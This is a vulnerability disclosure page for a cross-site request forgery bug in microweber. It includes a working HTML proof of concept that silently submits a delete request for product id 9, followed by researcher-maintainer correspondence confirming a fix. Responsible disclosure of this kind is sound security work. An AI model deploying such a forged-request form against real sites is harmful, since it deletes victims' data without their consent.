Cross-Site Request Forgery (CSRF) in microweber/microweber

Valid

Reported on

Jul 30th 2021


✍️ Description

Attacker able to delete any Product in My shop section if attacker knows the ids[] parameter value.

🕵️‍♂️ Proof of Concept

Here after running PoC.html on Firefox or Safari and click on submit button (also can be auto-submit) you will see that the Product with id 9 has been deleted.

//PoC.html

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://demo.microweber.org/demo/api/content/delete" method="POST">
<input type="hidden" name="ids&#91;&#93;" value="9" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

💥 Impact

Here a Product with value 9 will be deleted after clicking on submit button. 📍 Location app.js#L1

Occurences

We have contacted a member of the microweber team and are waiting to hear back 4 months ago
amammad
4 months ago

Researcher


Hey microweber team , can you give some feedbacks to me? thanks so much.

amammad
4 months ago

Researcher


Hey microweber team, I just want to sure that you see this important report too.

Peter Ivanov validated this vulnerability 4 months ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Peter Ivanov
4 months ago

Maintainer


Hello,

A fix for this issue has been applied by this commit

https://github.com/microweber/microweber/commit/8a577f8037e9615fd20e73838a50a28696b1f7fb

Seems its working

Thanks for finding it out

Please send your name and link to your profile for out "hall of fame" page

Cheers :)

amammad
4 months ago

Researcher


I am Ammmad,can you please vaidate other reports too?

amammad
4 months ago

Researcher


please set my profile address this https://www.huntr.dev/users/amammad

Peter Ivanov
4 months ago

Maintainer


Hello, your name has been added here https://microweber.org/list-of-contributors

We will fix the other issue and provide update there

Peter Ivanov confirmed that a fix has been merged on 8a577f 4 months ago
Peter Ivanov has been awarded the fix bounty
amammad
4 months ago

Researcher


With Lax other reports is fixed now,but I reports them too because they exist in different endpoints as the best way for fix each endpoint is make a csrf token for it.

Peter Ivanov
4 months ago

Maintainer


Hi, the csrf token is not added to the api/* endpoints by design, because they are used by API clients to communicate with the site

We check if the user is logged in and then allow api requests , you can see in this file
https://github.com/microweber/microweber/blob/dev/src/MicroweberPackages/App/Http/Middleware/ApiAuth.php#L23

If the user is not logged in we check of bearerToken and this allows api clients to communicate with the site's api

amammad
4 months ago

Researcher


Yah the bearerToken also is good for CSRF protection, nice job.

one question...did you see other CSRFs that I reported ?